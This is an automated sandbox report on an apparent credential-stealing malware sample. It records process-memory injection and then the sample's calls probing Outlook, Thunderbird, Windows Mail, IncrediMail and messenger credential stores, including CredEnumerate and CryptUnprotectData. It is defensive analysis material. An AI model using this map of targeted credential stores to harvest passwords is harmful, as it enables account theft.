usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x75f30000 0x75faafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x878 address = 0x400000, size = 114688 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x878 address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x878 address = 0x7efdf010, size = 4 True 1
Fn
Data
Modify Control Flow #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x878 os_tid = 0x480, address = 0x0 True 1
Fn
Threads
Thread 0x480
182 0
Category Operation Information Success Count Logfile
Module Get Handle module_name = private_0x0000000000400000, base_address = 0x400000 True 2
Fn
Module Load module_name = comctl32.dll, base_address = 0x75020000 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitCommonControlsEx, address_out = 0x75026be6 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x76480000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathA, address_out = 0x766cfb26 True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_lng.ini, type = file_attributes False 1
Fn
System Get Info type = Operating System True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Profiles, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Thunderbird\Profiles, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird False 1
Fn
File Get Info filename = C:\Program Files (x86)\Mozilla Thunderbird, type = file_attributes False 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = AddExportHeaderLine, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = WinPos False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = Columns False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = Sort, default_value = 0 True 1
Fn
Module Load module_name = pstorec.dll, base_address = 0x6fe60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\pstorec.dll, function = PStoreCreateInstance, address_out = 0x6fe6526c True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptUnprotectData, address_out = 0x76295a7f True 1
Fn
System Get Computer Name result_out = XABNCPUWKW True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes False 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x777871c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x7774b2ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x77787941 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x77787381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x77787481 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Identities True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Identities True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}, value_name = Username, data = Main Identity, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Identities False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\29091b5932ee0f48aec4673270b08577 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\29091b5932ee0f48aec4673270b08577 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\349c13b2d278c3458833b7862c0157f4 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\349c13b2d278c3458833b7862c0157f4 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\882b4247eb9feb478bcaf90664ec624c True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\882b4247eb9feb478bcaf90664ec624c False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = POP3 User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = IMAP User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = HTTP User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = SMTP User, data = 0, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 User, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Server, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = Display Name, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = Email, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP Server, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP Port, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Port, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Use SPA, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Password, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dfc6f427732b824da2ca53fc3cafb157 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dfc6f427732b824da2ca53fc3cafb157 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = POP3 User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders, value_name = POP3 User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders, value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders, value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders, value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\IncrediMail\Identities False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Group Mail False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\MessengerService False 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x777871c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x7774b2ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x77787941 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x77787381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x77787481 True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptUnprotectData, address_out = 0x76295a7f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Yahoo\Pager False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL False 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x777871c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x7774b2ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x77787941 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x77787381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x77787481 True 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, type = size True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, size = 1506, size_out = 1506 True 1
Fn
Data
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, type = size True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, size = 670, size_out = 670 True 1
Fn
Data
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, type = size True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, size = 1734, size_out = 1734 True 1
Fn
Data
